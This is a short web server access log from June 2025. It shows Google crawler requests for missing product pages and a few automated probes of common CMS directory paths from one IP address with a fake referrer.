66.249.68.67 - - [26/Jun/2025:17:05:43 +0000] "GET /oranger-bigarade-boutons-tisane-en-vrac-ss-10707234 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.69 - - [26/Jun/2025:17:06:35 +0000] "GET /oranger-bigarade-boutons-tisane-en-vrac-ss-10707234 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.68 - - [26/Jun/2025:17:25:46 +0000] "GET /bague-waves-ss-20139109 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.69 - - [26/Jun/2025:17:27:31 +0000] "GET /bague-waves-ss-20139109 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.147.33.166 - - [26/Jun/2025:17:44:47 +0000] "GET /index.php/css/?wp-admin/css/ HTTP/1.1" 404 1130 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
103.147.33.166 - - [26/Jun/2025:17:44:49 +0000] "GET /.well-known/ HTTP/1.1" 200 978 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
103.147.33.166 - - [26/Jun/2025:17:44:51 +0000] "GET /index.php/default/files/?sites/default/files/ HTTP/1.1" 404 1130 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
